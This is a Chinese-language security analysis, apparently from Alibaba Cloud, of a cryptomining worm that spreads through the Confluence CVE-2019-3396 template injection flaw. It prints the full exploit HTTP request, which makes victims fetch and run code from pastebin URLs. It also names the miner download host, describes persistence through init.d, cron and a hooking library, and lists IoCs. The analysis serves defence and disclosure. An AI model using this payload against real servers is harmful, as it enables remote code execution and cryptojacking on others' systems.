简介
4 月 10 日下午, 阿里云安全监测到一起使用 Confluence RCE 漏洞 (CVE-2019-3396) 进行大规模攻击的蠕虫事件, 并快速作出响应处理.
Confluence 是一个专业的企业知识管理与协同软件, 可用于构建企业 wiki. 本次遭到利用的漏洞, 在 Confluence 产品官网 3 月 20 日的 Security Advisory 中被最初提及, 其 Widget Connector 存在服务端模板注入漏洞, 攻击者能利用此漏洞能够实现目录穿越遍历甚至远程命令执行.
从 4 月 8 日国内安全研究员根据 patch 点写出 poc 并发布, 到 4 月 10 日大规模蠕虫攻击爆发, 中间只隔了短短两天, 再次对云平台及用户的快速响应能力构成严峻考验.
本文将对此次蠕虫事件进行分析, 并就如何预防类似事件给出安全建议.
蠕虫传播分析
该蠕虫的传播流程如图所示. 其手法, 程序结构, 使用的基础设施, 都与先前利用 Redis 攻击的 watchdogs 蠕虫极度相似, 可能是同一作者所为. 攻击者首先使用如下 payload 攻击 Confluence 服务(CVE-2019-3396):
- POST /REST/tinymce/1/macro/preview HTTP/1.1
- Host:[victim_host] :[Confluence_port(default 8090)]
- Content-Type: application/JSON; charset=utf-8
- {
- "contentId":"12345","macro":{
- "name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"https://pastebin.com/raw/KXjybn8M"
- }
- }}
该 payload 导致受害主机运行 https://pastebin.com/raw/KXjybn8M 中的代码:
随后, 攻击者将 payload 中加粗的 url 部分替换为 https://pastebin.com/raw/cHWdCAw2 后, 再次对同一台主机发送, 执行了以下 url 中存放的内容:
以上两条导致受害主机请求并执行 https://pastebin.com/raw/wDBa7jCQ
综上可知, 实际的恶意脚本位置在 https://pastebin.com/raw/xmxHzu5P , 判断受害主机架构后, 依次尝试使用 curl 和 wget 下载恶意程序
恶意程序位于 http://sowcar.com/t6/696/1554470400x2890174166.jpg , 逆向分析发现其与 watchdogs 挖矿木马升级版使用了类似的反逆向手段, 即程序加 upx 壳后, 改掉 magic number; 手动将 LSD 改为 UPX 后, 即可解压.
解压后程序结构如下图, 标红部分为攻击传播的蠕虫模块, 标蓝部分为在主机上进行持久化的模块, 标黄部分则是挖矿模块.
攻击传播的蠕虫模块中, Aago()和 Bbgo()进行 Redis 和 SSH 爆破, Ccgo()则是新添加的 Jenkins RCE 漏洞 (CVE-2019-1003000) 利用模块.
持久化模块中, NetdnsWrite()会写入 / etc/init.d/netdns 文件用于启动恶意程序守护进程; LibWrite()则写入 / usr/local/lib/libpamcd.so 用于 hook 各种系统函数; Cron()将下载恶意程序的指令写入 cron 文件从而定时执行.
挖矿模块会写入 / tmp/khugepageds 并启动挖矿.
安全建议
1. 及时对包括 Atlassian Confluence 在内的软件和服务进行升级或打补丁.
2. 建议使用阿里云安全的下一代云防火墙产品, 其阻断恶意外联, 能够配置智能策略的功能, 能够有效帮助防御入侵. 哪怕攻击者在主机上的隐藏手段再高明, 下载, 挖矿, 反弹 shell 这些操作, 都需要进行恶意外联; 云防火墙的拦截将彻底阻断攻击链. 此外, 用户还可以通过自定义策略, 直接屏蔽恶意网站, 达到阻断入侵的目的.
此外, 云防火墙独有的虚拟补丁功能, 能够帮助客户更灵活, 更 "无感" 地阻断攻击. 当前云防火墙已上线虚拟补丁支持防御针对 Confluence 漏洞的攻击, 建议用户在虚拟补丁里手动勾选进行开启, 如下图所示.
3. 对于有更高定制化要求的用户, 可以考虑使用阿里云安全管家服务. 购买服务后将有经验丰富的安全专家提供咨询服务, 定制适合您的方案, 帮助加固系统, 预防入侵. 入侵事件发生后, 也可介入直接协助入侵后的清理, 事件溯源等, 适合有较高安全需求的用户, 或未雇佣安全工程师, 但希望保障系统安全的企业.
- IoC
- url:
- https://pastebin.com/raw/UpJbVRuE
- https://pastebin.com/raw/cHWdCAw2
- https://pastebin.com/raw/v5xc0bjh
矿池:
systemtem.org:51640
恶意程序:
- Reference
- https://jira.atlassian.com/browse/CONFSERVER-57974
- https://paper.seebug.org/884/
- https://help.aliyun.com/knowledge_detail/114168.html
来源: https://yq.aliyun.com/articles/698490